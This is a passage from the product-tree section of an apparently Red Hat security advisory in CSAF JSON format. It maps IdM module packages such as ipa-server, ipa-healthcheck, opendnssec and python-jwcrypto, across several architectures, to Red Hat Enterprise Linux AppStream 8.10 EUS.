"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1"
},
"product_reference": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src::idm:DL1"
},
"product_reference": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src::idm:client"
},
"product_reference": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1"
},
"product_reference": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch::idm:client"
},
"product_reference": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1"
},
"product_reference": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client"
},
"product_reference": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1"
},
"product_reference": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client"
},
"product_reference": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1"
},
"product_reference": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1"
},
"product_reference": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1"
},
"product_reference": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1"
},
"product_reference": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1"
},
"product_reference": "ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1"
},
"product_reference": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1"
},
"product_reference": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1"
},
"product_reference": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1"
},
"product_reference": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1"
},
"product_reference": "ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1"
},
"product_reference": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1"
},
"product_reference": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1"
},
"product_reference": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1"
},
"product_reference": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1"
},
"product_reference": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1"
},
"product_reference": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1"
},
"product_reference": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1"
},
"product_reference": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1"
},
"product_reference": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1"
},
"product_reference": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1"
},
"product_reference": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src::idm:DL1"
},
"product_reference": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1"
},
"product_reference": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1"
},
"product_reference": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1"
},
"product_reference": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1"
},
"product_reference": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1"
},
"product_reference": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1"
},
"product_reference": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1"
},
"product_reference": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1"
},
"product_reference": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1"
},
"product_reference": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src::idm:DL1"
},
"product_reference": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src::idm:client"
},
"product_reference": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src::idm:DL1"
},
"product_reference": "python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src::idm:DL1"
},
"product_reference": "python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src::idm:client"
},
"product_reference": "python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1"
},
"product_reference": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src::idm:client"
},
"product_reference": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1"
},
"product_reference": "python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1"
},
"product_reference": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client"
},
"product_reference": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1"
},
"product_reference": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client"
},
"product_reference": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1"
},
"product_reference": "python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1"
},
"product_reference": "python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch::idm:DL1"
},
